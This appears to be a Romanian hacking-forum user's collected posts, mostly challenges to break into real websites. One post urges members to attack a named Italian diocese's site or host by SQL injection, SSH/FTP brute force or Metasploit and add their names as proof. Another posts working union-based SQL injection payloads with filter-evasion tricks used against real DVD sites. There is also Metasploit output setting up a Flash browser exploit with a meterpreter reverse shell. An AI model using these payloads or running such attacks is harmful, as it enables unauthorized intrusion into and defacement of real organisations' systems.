neo.hapsis

Stand in wc cu caciula mea cea roz,ma uitam pe zidul spart la poarta mea inchisa

Ti-a dat hint sau te-ai folosit de acel "lucru" ce le-a pus el sus?? Oricum bravo!

Dracu stie robert nu mai uitat la continutul total al sursei.Repede le am luat un index si le am modificat citeva randuri care sa refere la challenge!

[+] Target : Diocesi di Pozzuoli [+] Method : No matter (sql injection,ftp,ssh bruter,metasploit handling) [+] Requierements : Attack the website (no matter how) or attack to their host (metasploit,ftp,ssh etc) and put your name in the list who was here.And refresh the new link Proof |Challenge put your name on list| SOLVERS 1. Wubi 2. Co4ie 3. Zykraxx 4. ps-axl 5. oul 6. K01N 7. DaNNy.BV Goodluck!

Postarea pe care le-ai facut acuma este fara nerespect fata de altii membrii. Inainte sa postez ceva ..mai dai si tu un search!!!!!!!!!!!!! Postat de M2G https://rstcenter.com/forum/59951-sqli-through-sqlmap-burp-plugin.rst

Replies: 4 Views: 167 Challenge-ul s-a terminat iar sintaxele au fost actualizate.

User,Database,Version Nick : Table_Name

[+] Target : AV Maniacs, DVD Maniacs, DVD News, DVD Reviews, Movies [+] Metoda : Union Based + tricky [+] Cerinte :Nickul tau,User(),Database(),Version() [+] Tricky :sintaxele sa-le puneti cu culorile tarii [+] Proof : PM cu sintaxele Ideea de tabel luat de la Wubi. SUCCES TUTUROR COMPETITORILOR! [table=width: 800, class: grid, align: left] [tr] [td]Solvers[/td] [td]Syntax (dupa inchiderea challengului)[/td] [/tr] [tr] [td]Sweby[/td] [td]-1598+/*!50000UNION*/+/*!50000SELECT*/+0x5377656279,CONCAT_WS%28CHAR%2832,58,32%29,0x3c666f6e7420636f6c6f723d22726564223e,version%28%29,0x3c2f666f6e743e%29,CONCAT_WS%28CHAR%2832,58,32%29,0x3c666f6e7420636f6c6f723d2279656c6c6f77223e,user%28%29,0x3c2f666f6e743e%29,CONCAT_WS%28CHAR%2832,58,32%29,0x3c666f6e7420636f6c6f723d22626c7565223e,database%28%29,0x3c2f666f6e743e%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+[/td] [/tr] [tr] [td]klow[/td] [td]-1472 +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+ 0x6b6c3077,/**//*!12345cOnCat*/(0x3c666f6e7420636f6c6f723d7265643e,user()),/**//*!12345cOnCat*/(0x3c666f6e7420636f6c6f723d79656c6c6f773e,version()),/**//*!12345cOnCat*/(0x3c666f6e7420636f6c6f723d626c75653e,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--[/td] [/tr] [tr] [td]Wubi[/td] [td]-1434/**//*!50000UNION SELECT*//**/1,/*!50000cOnCat*/(/*!0x3c666f6e7420636f6c6f723d22726564223e*/,/*!Version()*/),/*!50000cOnCat*/(/*!0x3c666f6e7420636f6c6f723d2279656c6c6f77223e*/,/*!Database()*/),/*!50000cOnCat*/(/*!0x3c666f6e7420636f6c6f723d22626c7565223e*/,/*!User()*/),unhex(hex(0x6d75696520736865796b656e21)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+[/td] [/tr] [tr] [td]Trykton[/td] [td]-1472 union (select 0x547279746b6f6e,user(),database(),version(),@@datadir,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27)--[/td] [/tr] [tr] [td][/td] [td][/td] [/tr] [/table]

Nu am putut sa scot mai mult!

Done! Mersi ptr challenge!

Thanks for the challenge!

Varianta 1 Varianta 2

sunt inca activ

Da este POST injection , dar greu al naibii:(

Explica-i care e sursa , dupa care cum se downloadeaza ca doar e Dark ...... https://www.virustotal.com/file/2d2fcd87d085464ffb2e8e8644fc4dac51bd75bb38af8d1ef1eb117691dd7c74/analysis/

Le postezi de aiurea ca la upgrade este deja inclus.

La Multi Ani !!! Sa ai parte tot cea ce iti doresti si indeplinirea tuturor dorintelor!

+ -- --=[ 933 exploits - 499 auxiliary - 151 post + -- --=[ 251 payloads - 28 encoders - 8 nops msf use exploit/windows/browser/adobe_flash_otf_font msf exploit(adobe_flash_otf_font) > show options Module options (exploit/windows/browser/adobe_flash_otf_font): Name Current Setting Required Description ---- --------------- -------- ----------- ROP SWF yes The ROP chain to use (accepted: SWF, JRE) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL 0 no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.1.170 yes The listen address LPORT 29984 yes The listen port Exploit target: Le-am adaugat in loc sa fac update.LOL

Din threadul tau reiese ca ai facut o plata online fara sa primesti ceva pentru contra cost. Posta Italiana nu cred ca te poate ajuta cu ceva ,ca deja sa facut deja tranzactia. Daca stai undeva prin SUD,ma refer de la Roma in jos,nu cred ca ai sanse sa recuperezi un cacat de 80 de eu. Trezeste-te frate, 1. esti in Italia unde si un copil de 14 anisor scoate din buzunar 500 de eu,ca este membru de camora. 2. si inca un punct slab : dupa ei esti un straniero. Totusi incercarea nu moare pe nimeni ......eu asa apela la "Garda financiara"......dar suma e foarte mica nu mica.

Nu cred ca mai este valabil challengul decand le-a postat si sintaxa!!

Cum spune si titlul very easy..dar totusi bravo.Iti apreciez munca ta!

Dupa parerea mea: 1. nu este bun de nimic = programul alege tintele in locul tau 2. cum spui ptr incepatori e bun care da cu havij pina-i scurg balele 3. SA AI RESPECT FATA DE TINE si alege o tinta fara sa stii daca e vulnerabil sau nu!